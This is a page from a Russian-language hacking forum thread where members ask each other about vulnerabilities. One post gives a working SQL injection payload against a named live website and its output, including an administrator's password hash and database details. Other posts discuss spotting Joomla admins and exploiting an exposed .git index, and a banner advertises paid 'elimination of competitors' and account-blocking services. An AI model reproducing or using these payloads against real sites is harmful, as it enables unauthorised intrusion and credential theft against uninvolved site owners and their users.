Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 86 из 296

Опции темы

Поиск в этой теме

Опции просмотра

#851

13.11.2015, 01:56

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от Br@!ns

↑
или тот же mid.

или тот же substr? это аналогичные функции, не обязательно упоминать каждую

#852

17.11.2015, 05:40

jjokker

Новичок

Регистрация: 19.04.2008

Сообщений: 6

С нами: 9506245

Репутация: 34

Цитата:

Сообщение от Paladin

↑
http://kvestsetevichok.ru/index.php/press?view=category&id='
что то можно сделать? ибо не получается изменить запрос никак

Цитата:

Сообщение от Br@!ns

↑
Зачем вы кавычку вконце поставили я вообще не пойму.
Unknown column 'root' in 'where clause'
Обычная ошибка бд, никакой sql inj

Код:

http://kvestsetevichok.ru/index.php?no_html=1&tmpl=component&option=com_surveyforce&task=survey.SF_ajaxAction
[POST]action=next&survey=1&start_id=21133&user_id=449c373991919e6a22eca19c18e4b11c&quest_id[]=21 or (select count(*) from information_schema.columns group by concat((select concat_ws(0x3a,substring(username,1,50),substring(password,1,50)) from nvehp_users limit 0,1),0x3a,floor(rand(0)*2)))--&answer[]=152

Duplicate entry 'main:$2y$10$I4IqeXwMb5JkzFTTvEXQW.r71Nq/14JJgiIk75jsSK1:1' for key 'group_key'
Duplicate entry '83195:1' for key 'group_key'
Duplicate entry 'sergrus_kvest15@localhost::5.5.36-34.0-632.prec::sergrus_kvest15'

#853

17.11.2015, 12:32

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

С нами: 9100556

Репутация: 912

какая колонка в таблице %_users определяет админа сайта в послених версиях джумлы?

в предыдущих было usertype=Super Administrator

#854

19.11.2015, 21:34

AlexG

Познающий

Регистрация: 26.09.2015

Сообщений: 56

С нами: 5595446

Репутация: 5

Цитата:

Сообщение от SaNDER

↑
На сайте ASP при смене пароля поставил 8 кавычек и он успешно сохранил пароль,но не ошибок,нечего не было . Это нормально? .

Ну так теперь попробуйте залогиниться и узнаете. А вообще - скорее нормально, чем нет.

#855

20.11.2015, 12:49

sander

Новичок

Регистрация: 14.06.2010

Сообщений: 0

С нами: 8374164

Репутация: 0

Цитата:

Сообщение от AlexG

↑
Ну так теперь попробуйте залогиниться и узнаете. А вообще - скорее нормально, чем нет.

фишка в том,что я теперь не могу попасть в аккаунт .

#856

22.11.2015, 23:11

RWD

Участник форума

Регистрация: 25.04.2013

Сообщений: 153

С нами: 6868406

Репутация: 2

нашел сайт, при переходе в .git/index скачивается файл

как заюзать? спасибо

#857

22.11.2015, 23:15

Vip77

Участник форума

Регистрация: 29.09.2012

Сообщений: 233

С нами: 7167926

Репутация: 20

скинь содержимое файла

#858

22.11.2015, 23:24

RWD

Участник форума

Регистрация: 25.04.2013

Сообщений: 153

С нами: 6868406

Репутация: 2

Цитата:

Сообщение от Vip77

↑
скинь содержимое файла

там в основном пути wp-content/plugins/ и т.д

#859

23.11.2015, 00:12

Vip77

Участник форума

Регистрация: 29.09.2012

Сообщений: 233

С нами: 7167926

Репутация: 20

в таких файлах бывает можно найти пути к интересным файлам, через которые можно залиться.

но если там только пути к плагинам, то вряд ли что-то можно сделать, кроме как проверить их на уязвимости